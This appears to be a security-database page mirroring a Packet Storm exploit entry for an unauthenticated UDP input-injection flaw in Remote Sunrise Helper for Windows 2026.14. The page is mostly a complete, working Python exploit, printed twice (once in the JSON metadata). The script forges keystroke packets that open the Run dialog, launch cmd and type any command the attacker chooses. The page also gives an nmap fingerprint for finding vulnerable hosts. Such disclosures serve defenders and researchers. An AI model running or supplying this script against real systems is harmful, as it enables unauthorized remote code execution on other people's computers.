📄 Remote Sunrise Helper for Windows 2026.14 UDP Injection

Description

Remote Sunrise Helper for Windows version 2026.14 suffers from UDP injection that can allow for remote code execution...

Visit Original Source

Basic Information

ID PACKETSTORM:219273

Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions #!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated UDP Input Injection (RCE)
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#
# Identification:
# nmap -p- -T4 <target> --script ssl-cert
# Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US

import socket, time, sys, struct

if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <target_ip> <port> <command>")
print(f"Example: {sys.argv[0]} 192.168.1.103 49737 'calc'")
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

def key_press(vk, down):
packet = b'\x07\x00\x02\x00' + struct.pack('<H', vk) + (b'\x01' if down
else b'\x00')
sock.sendto(packet, (target, port))
time.sleep(0.05)

def send_text(text):
for ch in text:
packet = b'\x06\x00\x03\x00' + ch.encode('utf-16le')
sock.sendto(packet, (target, port))
time.sleep(0.02)

print(f"[+] Target: {target}:{port}")

key_press(0x5B, True)
time.sleep(0.05)
key_press(0x52, True)
time.sleep(0.05)
key_press(0x52, False)
time.sleep(0.05)
key_press(0x5B, False)
time.sleep(0.5)

send_text("cmd")
time.sleep(0.3)
key_press(0x0D, True)
key_press(0x0D, False)
time.sleep(0.5)

print(f"[+] Command: {command}")
send_text(command)
time.sleep(0.3)
key_press(0x0D, True)
key_press(0x0D, False)

print("[+] Done")
sock.close()

{
    "lastseen": "2026-04-20T16:31:08",
    "description": "Remote Sunrise Helper for Windows version 2026.14 suffers from UDP injection that can allow for remote code execution...",
    "published": "2026-04-20T00:00:00",
    "modified": "2026-04-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Remote Sunrise Helper for Windows 2026.14 UDP Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219273",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "#!/usr/bin/env python3\n    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 -\n    Unauthenticated UDP Input Injection (RCE)\n    # Date: 2026-04-20\n    # Exploit Author: Chokri Hammedi\n    # Software: https://rs.ltd/latest.php?os=win\n    # Vendor: https://rs.ltd/\n    # Version: 2026.14\n    # Tested on: Windows 10 / Windows 11\n    #\n    # Identification:\n    # nmap -p- -T4 <target> --script ssl-cert\n    # Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US\n    \n    import socket, time, sys, struct\n    \n    if len(sys.argv) < 4:\n        print(f\"Usage: {sys.argv[0]} <target_ip> <port> <command>\")\n        print(f\"Example: {sys.argv[0]} 192.168.1.103 49737 'calc'\")\n        sys.exit(1)\n    \n    target = sys.argv[1]\n    port = int(sys.argv[2])\n    command = sys.argv[3]\n    \n    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    \n    def key_press(vk, down):\n        packet = b'\\x07\\x00\\x02\\x00' + struct.pack('<H', vk) + (b'\\x01' if down\n    else b'\\x00')\n        sock.sendto(packet, (target, port))\n        time.sleep(0.05)\n    \n    def send_text(text):\n        for ch in text:\n            packet = b'\\x06\\x00\\x03\\x00' + ch.encode('utf-16le')\n            sock.sendto(packet, (target, port))\n            time.sleep(0.02)\n    \n    print(f\"[+] Target: {target}:{port}\")\n    \n    key_press(0x5B, True)\n    time.sleep(0.05)\n    key_press(0x52, True)\n    time.sleep(0.05)\n    key_press(0x52, False)\n    time.sleep(0.05)\n    key_press(0x5B, False)\n    time.sleep(0.5)\n    \n    send_text(\"cmd\")\n    time.sleep(0.3)\n    key_press(0x0D, True)\n    key_press(0x0D, False)\n    time.sleep(0.5)\n    \n    print(f\"[+] Command: {command}\")\n    send_text(command)\n    time.sleep(0.3)\n    key_press(0x0D, True)\n    key_press(0x0D, False)\n    \n    print(\"[+] Done\")\n    sock.close()",
    "sourceHref": "https://packetstorm.news/download/219273",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219273/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Remote Sunrise Helper for Windows 2026.14 UDP Injection_PACKETSTORM:219273

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply